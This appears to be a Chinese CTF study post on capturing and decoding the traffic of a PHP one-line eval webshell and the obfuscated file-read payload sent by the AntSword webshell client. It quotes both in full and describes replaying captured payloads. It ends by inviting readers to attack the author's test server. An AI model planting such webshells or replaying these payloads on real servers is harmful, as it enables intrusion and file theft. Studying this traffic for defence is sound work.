1.抓包學習
用tcpdump抓包
tcpdump port 80 -w 1.pcap
用前幾天給計網老師搭的上傳環境hh
傳了一個一句話木馬上去
<?php @eval($_POST[value]);?>
包下來了,看一眼
直接追蹤流,可以看到這個上傳的文件
這個配置出了點小問題,影響不大。
用蟻劍連一下子,再抓一下流量,可以看到這個流量
/www/wwwroot/175.24.78.155/index.html&
value=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{return $out;};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "21d6e540e0b3";
echo @asenc($output);
echo "cb3cabef";}
ob_start();
try{
$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["he75a2a982b4fc"]):$_POST["he75a2a982b4fc"])
;$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);@readfile($F);
}
else
{echo
("ERROR:// Can Not Read");};
}catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();
url解一下碼,可以看到蟻劍是自動做了混淆的,這個還是很有用的。
這個返回包的gzip,是編碼過的,直接儲存為zip文件再解密就能看到明文了。
把原始數據保存,轉16進制
接着把1f8b之前的刪掉,再解壓就可以了
2.進一步利用的研究
這里是抓取連接一句話木馬利用的數據包
像這樣的簡單的,直接拿過來用就可以了,理解也很好理解
但是想蟻劍那種,做了混淆的應該怎么辦呢,我直接把payload copy下來
可以看到,直接成功
但是這個cat flag的包,經過嘗試,我並沒有成功,是因為路徑不一樣,蟻劍用的絕對路徑,在awd比賽的時候是不存在這種問題滴
不過包里是有flag的
這里面卻沒有。。。emmm應該問題不大
各位大佬,我環境是給計網老師搭的,現在還沒關,大佬們想日就日吧,求求別刪東西,我數據庫作業還在上面呢。又乖又慫.jpg